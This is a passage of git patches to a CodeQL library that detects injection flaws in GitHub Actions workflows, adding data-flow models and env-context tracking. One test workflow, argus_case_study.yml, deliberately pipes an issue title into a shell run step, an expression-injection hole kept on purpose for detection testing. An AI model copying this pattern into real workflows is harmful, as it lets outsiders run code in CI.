@@ -15,9 +15,13 @@ import actions import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) } + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + sinkNode(this, "expression-injection") + } } private module MyConfig implements DataFlow::ConfigSig { From 4f0b66ea0381f849682efecfb66dcea47652ba18 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 13:47:44 +0100 Subject: [PATCH 0019/1267] Refactor MaD semantics --- ql/lib/codeql/actions/Ast.qll | 51 ++++++++++++++++--- .../codeql/actions/dataflow/ExternalFlow.qll | 20 ++++++-- .../codeql/actions/dataflow/FlowSources.qll | 25 +++++++-- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 22 ++++++-- .../internal/ExternalFlowExtensions.qll | 4 +- ql/lib/ext/REMOVEME.model.yml | 6 +++ .../frabert-replace-string-action.model.yml | 7 +++ ...-actions-find-and-replace-string.model.yml | 9 ++++ ql/lib/ext/sinks.model.yml | 11 ---- ql/lib/ext/sources.model.yml | 11 ---- ql/lib/ext/summaries.model.yml | 19 ------- ql/lib/ext/tj-actions-changed-files.model.yml | 28 ++++++++++ 12 files changed, 153 insertions(+), 60 deletions(-) create mode 100644 ql/lib/ext/REMOVEME.model.yml create mode 100644 ql/lib/ext/frabert-replace-string-action.model.yml create mode 100644 ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml delete mode 100644 ql/lib/ext/sinks.model.yml delete mode 100644 ql/lib/ext/sources.model.yml delete mode 100644 ql/lib/ext/summaries.model.yml create mode 100644 ql/lib/ext/tj-actions-changed-files.model.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a25ef856233..697f28b54a2 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -115,6 +115,9 @@ class JobStmt extends Statement instanceof Actions::Job { */ string getId() { result = super.getId() } + /** Gets the workflow that this job is a part of. */ + WorkflowStmt getWorkflowStmt() { result = super.getWorkflow() } + /** Gets the step at the given index within this job. */ StepStmt getStepStmt(int index) { result = super.getStep(index) } @@ -181,6 +184,26 @@ class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } JobStmt getJobStmt() { result = super.getJob() } + + /** + * Gets a environment variable expression by name in the scope of the current step. + */ + Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** @@ -192,6 +215,8 @@ abstract class UsesExpr extends Expression { abstract string getVersion(); abstract Expression getArgumentExpr(string key); + + abstract Expression getEnvExpr(string name); } /** @@ -212,6 +237,8 @@ class StepUsesExpr extends StepStmt, UsesExpr { result = with.lookup(key) ) } + + override Expression getEnvExpr(string name) { result = this.(StepStmt).getEnvExpr(name) } } /** @@ -260,6 +287,23 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { override Expression getArgumentExpr(string key) { this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + override Expression getEnvExpr(string name) { + this.(YamlMapping).lookup("env").(YamlMapping).lookup(name) = result + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** @@ -272,13 +316,6 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } - Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } - string getScript() { result = scriptExpr.getValue() } } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 6e02e4036ba..b19fbcbaca6 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -3,8 +3,8 @@ import codeql.actions.DataFlow import actions /** Holds if a source model exists for the given parameters. */ -predicate sourceModel(string action, string version, string output, string kind) { - Extensions::sourceModel(action, version, output, kind) +predicate sourceModel(string action, string version, string output, string trigger, string kind) { + Extensions::sourceModel(action, version, output, trigger, kind) } /** Holds if a sink model exists for the given parameters. */ @@ -17,15 +17,27 @@ predicate sinkModel(string action, string version, string input, string kind) { Extensions::sinkModel(action, version, input, kind) } +/** + * MaD sinks + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - input arg: sink node (prefixed with either `env.` or `input.`) + * - kind: sink kind + */ predicate sinkNode(DataFlow::ExprNode sink, string kind) { exists(UsesExpr uses, string action, string version, string input | - uses.getArgumentExpr(input.splitAt(",").trim()) = sink.asExpr() and + ( + if input.trim().matches("env.%") + then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("input\\.", "")) + else sink.asExpr() = uses.getArgumentExpr(input.trim()) + ) and sinkModel(action, version, input, kind) and uses.getCallee() = action and ( if version.trim() = "*" then uses.getVersion() = any(string v) - else uses.getVersion() = version.splitAt(",").trim() + else uses.getVersion() = version.trim() ) ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 3bde829321f..120444863e5 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -125,19 +125,36 @@ private class EventSource extends RemoteFlowSource { override string getSourceType() { result = "User-controlled events" } } +/** + * MaD sources + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - output arg: To node (prefixed with either `env.` or `output.`) + * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event. + */ private class ExternallyDefinedSource extends RemoteFlowSource { string soutceType; ExternallyDefinedSource() { - exists(UsesExpr uses, string action, string version, /*string output,*/ string kind | - sourceModel(action, version, _, kind) and + exists( + UsesExpr uses, string action, string version, string output, string trigger, string kind + | + sourceModel(action, version, output, trigger, kind) and uses.getCallee() = action and ( if version.trim() = "*" then uses.getVersion() = any(string v) - else uses.getVersion() = version.splitAt(",").trim() + else uses.getVersion() = version.trim() + ) and + ( + if output.trim().matches("env.%") + then this.asExpr() = uses.getEnvExpr(output.trim().replaceAll("output\\.", "")) + else + // 'output.' is the default qualifier + // TODO: Taint just the specified output + this.asExpr() = uses ) and - uses = this.asExpr() and soutceType = kind ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index e5fa04427cc..95566aee96c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -21,16 +21,32 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } +/** + * MaD summaries + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - input arg: From node (prefixed with either `env.` or `input.`) + * - output arg: To node (prefixed with either `env.` or `output.`) + * - kind: Either 'Taint' or 'Value' + */ predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr uses, string action, string version, string input | - /*, string output */ summaryModel(action, version, input, _, "taint") and + // `output` not used yet + summaryModel(action, version, input, _, "taint") and uses.getCallee() = action and ( if version.trim() = "*" then uses.getVersion() = any(string v) - else uses.getVersion() = version.splitAt(",").trim() + else uses.getVersion() = version.trim() + ) and + ( + if input.trim().matches("env.%") + then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) + else + // 'input.' is the default qualifier + pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) ) and - pred.asExpr() = uses.getArgumentExpr(input.splitAt(",").trim()) and succ.asExpr() = uses ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 89cf4de0261..93ec64b059e 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,7 +5,9 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel(string action, string version, string output, string kind); +extensible predicate sourceModel( + string action, string version, string output, string trigger, string kind +); /** * Holds if a summary model exists for the given parameters. diff --git a/ql/lib/ext/REMOVEME.model.yml b/ql/lib/ext/REMOVEME.model.yml new file mode 100644 index 00000000000..b21aa207bb2 --- /dev/null +++ b/ql/lib/ext/REMOVEME.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sinkModel + data: + - [ "FAKE-mad9000/actions-find-and-replace-string", "*", "source", "expression-injection" ] diff --git a/ql/lib/ext/frabert-replace-string-action.model.yml b/ql/lib/ext/frabert-replace-string-action.model.yml new file mode 100644 index 00000000000..e211fe2b69c --- /dev/null +++ b/ql/lib/ext/frabert-replace-string-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ] + - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ] diff --git a/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml new file mode 100644 index 00000000000..28517f44568 --- /dev/null +++ b/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - [ "mad9000/actions-find-and-replace-string", "*", "source", "value", "taint" ] + - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ] + - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ] + - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ] diff --git a/ql/lib/ext/sinks.model.yml b/ql/lib/ext/sinks.model.yml deleted file mode 100644 index e28ec39d1be..00000000000 --- a/ql/lib/ext/sinks.model.yml +++ /dev/null @@ -1,11 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: sinkModel - data: - - [ - "FAKE-mad9000/actions-find-and-replace-string", - "*", - "source", - "expression-injection", - ] diff --git a/ql/lib/ext/sources.model.yml b/ql/lib/ext/sources.model.yml deleted file mode 100644 index 666a5532865..00000000000 --- a/ql/lib/ext/sources.model.yml +++ /dev/null @@ -1,11 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: sourceModel - data: - - [ - "tj-actions/changed-files", - "v10, v20, v30, v40", - "all_changed_file", - "PR", - ] diff --git a/ql/lib/ext/summaries.model.yml b/ql/lib/ext/summaries.model.yml deleted file mode 100644 index cc8e2df5fe9..00000000000 --- a/ql/lib/ext/summaries.model.yml +++ /dev/null @@ -1,19 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: summaryModel - data: - - [ - "mad9000/actions-find-and-replace-string", - "*", - "source, replace", - "value", - "taint", - ] - - [ - "frabert/replace-string-action", - "*", - "string, replace-with", - "replaced", - "taint", - ] diff --git a/ql/lib/ext/tj-actions-changed-files.model.yml b/ql/lib/ext/tj-actions-changed-files.model.yml new file mode 100644 index 00000000000..a3f687a0611 --- /dev/null +++ b/ql/lib/ext/tj-actions-changed-files.model.yml @@ -0,0 +1,28 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "tj-actions/changed-files", "*", "added_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "any_changed", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "any_deleted", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "any_modified", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "changed_keys", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "copied_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "deleted_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "modified_keys", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "only_changed", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "only_deleted", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "only_modified", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_deleted_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "renamed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "type_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "unknown_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "unmerged_files", "*", "PR changed files" ] From 4b57cee300fba6fa9a7268a9a88a4fe402a75f03 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 15:12:36 +0100 Subject: [PATCH 0020/1267] Initial implementaion of env context support --- ql/lib/codeql/actions/Ast.qll | 48 +++++++++----- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 5 +- .../dataflow/internal/DataFlowPrivate.qll | 65 +++++++++++-------- .../.github/workflows/argus_case_study.yml | 29 +++++++++ 4 files changed, 101 insertions(+), 46 deletions(-) create mode 100644 ql/src/test/.github/workflows/argus_case_study.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 697f28b54a2..ec05fa309d3 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -330,11 +330,14 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } JobStmt getJobStmt() { result.getAChildNode*() = this } + + abstract Expression getRefExpr(); } /** - * A ExprAccessExpr where the expression evaluated is a step output read. - * eg: `${{ steps.changed-files.outputs.all_changed_files }}` + * Holds for an ExprAccessExpr accesing the `steps` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` */ class StepOutputAccessExpr extends ExprAccessExpr { string stepId; @@ -347,17 +350,16 @@ class StepOutputAccessExpr extends ExprAccessExpr { this.getExpression().regexpCapture("steps\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) } - string getStepId() { result = stepId } - - string getVarName() { result = varName } - - StepStmt getStepStmt() { result.getId() = stepId } + override Expression getRefExpr() { + this.getJobStmt() = result.(StepStmt).getJobStmt() and + result.(StepStmt).getId() = stepId + } } /** - * A ExprAccessExpr where the expression evaluated is a job output read. - * eg: `${{ needs.job1.outputs.foo}}` - * eg: `${{ jobs.job1.outputs.foo}}` (for reusable workflows) + * Holds for an ExprAccessExpr accesing the `needs` or `job` contexts. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ needs.job1.outputs.foo}}` or `${{ jobs.job1.outputs.foo}}` (for reusable workflows) */ class JobOutputAccessExpr extends ExprAccessExpr { string jobId; @@ -372,9 +374,7 @@ class JobOutputAccessExpr extends ExprAccessExpr { .regexpCapture("(needs|jobs)\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 2) } - string getVarName() { result = varName } - - Expression getOutputExpr() { + override Expression getRefExpr() { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and @@ -391,8 +391,9 @@ class JobOutputAccessExpr extends ExprAccessExpr { } /** - * A ExprAccessExpr where the expression evaluated is a reusable workflow input read. - * eg: `${{ inputs.foo}}` + * Holds for an ExprAccessExpr accesing the `inputs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ inputs.foo }}` */ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { string paramName; @@ -401,12 +402,23 @@ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) } - string getParamName() { result = paramName } - - Expression getInputExpr() { + override Expression getRefExpr() { exists(ReusableWorkflowStmt w | w.getLocation().getFile() = this.getLocation().getFile() and w.getInputsStmt().getInputExpr(paramName) = result ) } } + +/** + * Holds for an ExprAccessExpr accesing the `env` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ env.foo }}` + */ +class EnvAccessExpr extends ExprAccessExpr { + string varName; + + EnvAccessExpr() { varName = this.getExpression().regexpCapture("env\\.([A-Za-z0-9_-]+)", 1) } + + override Expression getRefExpr() { exists(RunExpr s | s.getEnvExpr(varName) = result) } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 95566aee96c..cafd6083276 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -81,7 +81,10 @@ predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { exists(string script, string line | script = r.getScript() and line = script.splitAt("\n") and - line.regexpMatch(".*::set-output\\s+name.*") and + ( + line.regexpMatch(".*::set-output\\s+name.*") or + line.regexpMatch(".*>>\\s*$GITHUB_ENV.*") + ) and script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = r diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 76495e3f80c..ee59e25ab20 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -164,41 +164,52 @@ class ArgumentPosition extends string { */ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } -predicate stepUsesOutputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output - exists(StepUsesExpr uses, StepOutputAccessExpr outputRead | - uses = nodeFrom.asExpr() and - outputRead = nodeTo.asExpr() and - outputRead.getStepId() = uses.getId() and - uses.getJobStmt() = outputRead.getJobStmt() +/** + * Holds if there is a local flow step between a ${{}} expression accesing a step output variable and the step output itself + * e.g. ${{ steps.step1.output.foo }} + */ +predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(StepStmt astFrom, StepOutputAccessExpr astTo | + (astFrom instanceof UsesExpr or astFrom instanceof RunExpr) and + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom ) } -predicate runOutputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output - exists(RunExpr uses, StepOutputAccessExpr outputRead | - uses = nodeFrom.asExpr() and - outputRead = nodeTo.asExpr() and - outputRead.getStepId() = uses.getId() and - uses.getJobStmt() = outputRead.getJobStmt() - ) -} - -predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression +/** + * Holds if there is a local flow step between a ${{}} expression accesing a job output variable and the job output itself + * e.g. ${{ needs.job1.output.foo }} or ${{ job.job1.output.foo }} + */ +predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Expression astFrom, JobOutputAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getOutputExpr() = astFrom + astTo.getRefExpr() = astFrom ) } -predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is a ReusableWorkflowInputAccessExpr and nodeFrom is the ReusableWorkflowStmt corresponding parameter expression +/** + * Holds if there is a local flow step between a ${{}} expression accesing a reusable workflow input variable and the input itself + * e.g. ${{ inputs.foo }} + */ +predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Expression astFrom, ReusableWorkflowInputAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getInputExpr() = astFrom + astTo.getRefExpr() = astFrom + ) +} + +/** + * Holds if there is a local flow step between a ${{}} expression accesing an env var and the var definition itself + * e.g. ${{ env.foo }} + */ +predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Expression astFrom, EnvAccessExpr astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom ) } @@ -209,10 +220,10 @@ predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { */ pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { - stepUsesOutputDefToUse(nodeFrom, nodeTo) or - runOutputDefToUse(nodeFrom, nodeTo) or - jobOutputDefToUse(nodeFrom, nodeTo) or - reusableWorkflowInputDefToUse(nodeFrom, nodeTo) + stepsCtxLocalStep(nodeFrom, nodeTo) or + jobsCtxLocalStep(nodeFrom, nodeTo) or + inputsCtxLocalStep(nodeFrom, nodeTo) or + envCtxLocalStep(nodeFrom, nodeTo) } /** diff --git a/ql/src/test/.github/workflows/argus_case_study.yml b/ql/src/test/.github/workflows/argus_case_study.yml new file mode 100644 index 00000000000..7b9c5735488 --- /dev/null +++ b/ql/src/test/.github/workflows/argus_case_study.yml @@ -0,0 +1,29 @@ +name: Issue Workflow + +on: + issues: + types: [opened, edited] + +jobs: + redirectIssue: + runs-on: ubuntu-latest + name: Check for issue transfer + env: + content_analysis_response: undefined + steps: + - uses: actions/checkout@v2 + - name: Remove conflicting chars + env: + ISSUE_TITLE: ${{github.event.issue.title}} + uses: frabert/replace-string-action@1.2 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_TITLE}} + replace-with: "-" + - name: Check info + id: check-info + run: | + echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV + + From 99358c62e2e1a252a9e38dfdab8d51bb3d43a499 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 15:47:27 +0100 Subject: [PATCH 0021/1267] Extend CFG to reach env expressions --- ql/lib/codeql/actions/Ast.qll | 68 +++++++++++++------ .../actions/controlflow/internal/Cfg.qll | 6 +- ql/lib/test/test.ql | 14 +--- 3 files changed, 53 insertions(+), 35 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ec05fa309d3..61f2d8e91d7 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -184,26 +184,6 @@ class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } JobStmt getJobStmt() { result = super.getJob() } - - /** - * Gets a environment variable expression by name in the scope of the current step. - */ - Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** @@ -238,7 +218,25 @@ class StepUsesExpr extends StepStmt, UsesExpr { ) } - override Expression getEnvExpr(string name) { result = this.(StepStmt).getEnvExpr(name) } + /** + * Gets a environment variable expression by name in the scope of the current step. + */ + override Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** @@ -317,6 +315,26 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } string getScript() { result = scriptExpr.getValue() } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** @@ -420,5 +438,11 @@ class EnvAccessExpr extends ExprAccessExpr { EnvAccessExpr() { varName = this.getExpression().regexpCapture("env\\.([A-Za-z0-9_-]+)", 1) } - override Expression getRefExpr() { exists(RunExpr s | s.getEnvExpr(varName) = result) } + override Expression getRefExpr() { + exists(JobUsesExpr s | s.getEnvExpr(varName) = result) + or + exists(StepUsesExpr s | s.getEnvExpr(varName) = result) + or + exists(RunExpr s | s.getEnvExpr(varName) = result) + } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 9129ee5dc61..0dd34ff926f 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -227,7 +227,8 @@ private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgumentExpr(_) and l = child.getLocation() + (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and + l = child.getLocation() | child order by @@ -240,7 +241,8 @@ private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgumentExpr(_) and l = child.getLocation() + (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and + l = child.getLocation() | child order by diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index fe76852fa53..36c268ecc99 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -31,10 +31,6 @@ query predicate runStepChildren(RunExpr run, AstNode child) { child.getParentNod query predicate varAccesses(ExprAccessExpr ea, string expr) { expr = ea.getExpression() } -query predicate outputAccesses(StepOutputAccessExpr va, string id, string var) { - id = va.getStepId() and var = va.getVarName() -} - query predicate orphanVarAccesses(ExprAccessExpr va, string var) { var = va.getExpression() and not exists(AstNode n | n = va.getParentNode()) @@ -53,25 +49,21 @@ query predicate cfgNodes(Cfg::Node n) { } query predicate dfNodes(DataFlow::Node e) { - e.getLocation().getFile().getBaseName() = "simple1.yml" + e.getLocation().getFile().getBaseName() = "argus_case_study.yml" } query predicate exprNodes(DataFlow::ExprNode e) { any() } query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } -query predicate localFlow(StepUsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() } - query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } -query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } - query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } query predicate scopes(Cfg::CfgScope c) { any() } -query predicate sources(string action, string version, string output, string kind) { - sourceModel(action, version, output, kind) +query predicate sources(string action, string version, string output, string trigger, string kind) { + sourceModel(action, version, output, trigger, kind) } query predicate summaries(string action, string version, string input, string output, string kind) { From e9707af38df5af35813eb01dd4fa70d7bbcb1eec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 22:55:58 +0100 Subject: [PATCH 0022/1267] feat: support for composite action's analysis --- ql/lib/codeql/actions/Ast.qll | 88 ++++++++++--------- .../actions/controlflow/internal/Cfg.qll | 44 ++++++++-- .../codeql/actions/dataflow/FlowSources.qll | 11 +++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 9 +- .../dataflow/internal/DataFlowPublic.qll | 7 +- ql/lib/test/test.ql | 2 +- .../CWE-020/CompositeActionSummaries.ql | 36 ++++++++ .../CWE-020/CompositeActionsSources.ql | 38 ++++++++ .../Security/CWE-094/ExpressionInjection.ql | 2 +- .../.github/workflows/calling_composite.yml | 14 